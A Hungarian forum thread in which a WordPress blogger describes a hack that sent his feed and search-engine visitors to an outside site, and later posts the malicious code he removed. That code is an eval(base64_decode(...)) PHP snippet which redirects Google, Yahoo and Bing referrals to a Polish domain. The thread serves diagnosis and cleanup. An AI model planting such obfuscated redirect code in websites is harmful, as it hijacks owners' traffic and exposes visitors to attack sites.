Olcsó WP/PHP-zseni kerestetik RSS témában

Sziasztok,lehet, hogy nagyon egyszerű a megoldása a problémámnak, de eljutottam arra a szintre, hogy most már fizetnék is azért, hogy valaki megoldja nekem.

Van egy blogom (a http://raktalicska.hu ), és akadt egy “kis” gondom a feedjével:Google Reader-ben kattintva bármelyik linkre amelyik elvileg az oldalra visz vissza az elirányít a http://p3p0.com/?said=3333g&q=facebook-ra, vagy rosszabb esetben egy bejelentett támadó-webhelyre. Ezt csak a Readerben, ill. iGoogle-ben csinálja, szóval lehet, hogy nem is bonyolult a megoldás.További infók (mert persze már írtam róla): ezen a linken, illetve ezen.Jelentkezni a jonc[kukac]raktalicska.hu email-címen, illetve ebbe a topikba írva lehet!Köszönöm előre is, ha valaki segítene… én nem értek hozzá :slight_smile:JonC

Nálam az olcsó és a zseni kizárják egymást.

nincs több tízezrem erre a projectre, de ha egy zseni ennyire drága, akkor megelégszek egy sima kis webfejlesztővel is, aki szintén meg tudja oldani a dolgot. ne akadjunk fent a részleteken.

bocsi a dupláért, de ma - külső, és ingyenes segítséggel - sikerült megoldanom a dolgot. ezt a topikot emiatt lehetne akár törölni/zárolni is, szerencsére már tárgytalan az ajánlatom :slight_smile:

amúgy ha base64elt kódot látsz akkor ott elég nagy valószínűséggel nagy diszonóság lappang.

Meg tudnád adni az elérésed címét?

valamint a base64elt kód is érdekelne (ha még megvan)…

Előre is köszi!

Szia,természetesen megvan még a kód (elraktam emlékbe :)), íme:

Code:

eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJnb29nbGUiKSkgewoJaWYgKCFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sIi5udSIpIGFuZCAhc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJzaXRlIikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImludXJsIikpewoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsKCQlpZiAoc3RyaXN0cigka2tbMV0sIiYiKSkgewoJCQlwcmVnX21hdGNoICgiLyguKj8pXCYvIiwka2tbMV0sJGtleTIpOwoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOwoJCX1lbHNlIHsKCQkJJGtleXdvcmQ9dXJsZGVjb2RlKCRra1sxXSk7CgkJfQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRrZXl3b3JkKTsKCQlleGl0KCk7Cgl9Cgp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInlhaG9vIikpIHsKcHJlZ19tYXRjaCAoIi9wXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7CgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2ZnbmZkZnRocnYuYmVlLnBsLz9xPSIuJGtrWzFdKTsKCQlleGl0KCk7Cn1lbHNlaWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiYmluZyIpKSB7CnByZWdfbWF0Y2ggKCIvcVw9KC4qPykmLyIsJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwka2spOwoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9mZ25mZGZ0aHJ2LmJlZS5wbC8/cT0iLiRra1sxXSk7CgkJZXhpdCgpOwp9Cgk="));
Elérés címe alatt mit értesz amúgy?

Hali!

Íme a visszafejtett kód:

http://hgrg.info/2010/02/my-wordpress-feed-is-forwarded/

Bennevan a továbbításokat fogadó webhely kódja is… brutál…

igen, valóban az… amúgy még délután kikódolta nekem is az egyik kollegám (fene se gondolta volna, hogy ennyire vágja), és arra a konzekvenciára jutottunk, hogy nem csak a Readert, hanem a Google találati oldalait is érinti a dolog, tehát ha valaki olyan linkre kattintott, ami alapból “hozzám” irányította volna az ment a hack írójának az oldalára. furcsállottam is, hogy már napok óta nem jött látogató keresőkifejezés útján, de nem tudtam mit kezdeni ezzel az információval. most már világos… rohadjon meg az összes befőttje ennek a lengyel rohadéknak, aki ezt csinálta az oldalammal!(további infóim erről az isssue-ról itt találhatóak)

hát az a büdös nagy helyzet, hogy bár a domain .pl nek van bejegyezve gyanítom, hogy soha az életben nem lehetne megtalálni a regisztrálóját. Ez ilyen kis gennyládák proxyk tömkelegére fűzik fel magukat… simán lehet egy ruszki,amcsi vagy akár magyar hekus az “alkotó”…

JonC: most megnéztem az oldaladat ujra. Három böngészővel is csúszka jelenik meg az alján, az oldal betöltésének vége felé … eddig meg nem volt. Ez mitől van? :o

@varnyu: háát… talán attól, hogy végre segített egy kedves fórumozó kikódolni a footer.php-met (ami - nahát - pont base64-gyel volt szintén megkínálva), és lehetséges, hogy az új lábléc miatt lett ilyen. most hogy mondtad valóban ott a csúszka, nekem eddig fel sem tűnt :slight_smile: amgúgy szinte tuti hogy ez az új lábléc a ludas, mivel van egy másik aldomainem ( http://regiblog.raktalicska.hu/?wptheme=mintfresh ), ahol viszont még az eredeti figyel, ott nincs is semmiféle horizontális csúszka.amúgy passzolom a kérdést, hogy hogyan lehet megcsinálni, nem értek hozzá :slight_smile:

JonC: én is csak ma láttam a csúszkát, tegnap délelőtt még nem volt ott! Kerestem is, hogy mi lehet az a “széles” valami, ami kihúzza szélesre az oldalt, de én se értek hozzá :slight_smile:

megnézem, hátha kihagytam valahol egy divet, de sztem ezt adta…

no még 1xCode:Mintfresh design by Leather Goods Coding PKV Private Krankenversicherung, Webdesign ,Web HostingÉrdekes. Nálam nem esik szét. Tehát valamelyik pluginod cseszi szét..

lehetséges… mindegy, vagyok olyan igénytelen, hogy ez ne zavarjon annyira :slight_smile: (azért belenézek a footer.php-mba, mivel az épp használatban levő nem így néz ki)

tökugyanígy néz ki :smiley: csak az a href sor más… de az nem változtat az oldal szerkezetén :smiley:

well… ebben az esetben egy elegáns ignorálás lesz a problémára adott válaszom :slight_smile:

:smiley: :smiley:

:slight_smile: ha neked jó akkor nekem is jó :slight_smile: